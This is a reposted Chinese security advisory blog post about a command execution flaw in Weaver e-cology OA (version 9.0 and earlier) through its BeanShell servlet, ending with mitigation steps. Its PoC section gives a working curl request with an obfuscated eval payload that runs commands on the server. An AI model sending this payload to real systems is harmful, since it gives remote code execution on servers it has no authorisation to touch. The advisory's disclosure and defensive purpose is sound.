码迷,mamicode.com
首页 > 其他好文 > 详细

泛微OA系统多版本存在命令执行漏洞

时间:2019-10-30 16:27:04      阅读:195      评论:0      收藏:0      [点我收藏+]

标签:执行   nbsp   软件   影响   out   oa办公   技术   利用   bsh   

0x01漏洞描述

泛微OA办公系统是一款协调办公软件。

泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03影响范围

泛微 e-cology<=9.0

0x04漏洞复现

访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:

技术图片

 

 

 

技术图片

 

技术图片

 

 

 

0x05poc

漏洞路径:/weaver/bsh.servlet.BshServlet

exec("whoami")

curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d ‘bsh.script=ev

al%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw‘

0x06修复方案

1、屏蔽/weaver/*目录的访问;

2、https://www.weaver.com.cn/cs/securityDownload.asp

 

泛微OA系统多版本存在命令执行漏洞

标签:执行   nbsp   软件   影响   out   oa办公   技术   利用   bsh   

原文地址:https://www.cnblogs.com/Sylon/p/11765543.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!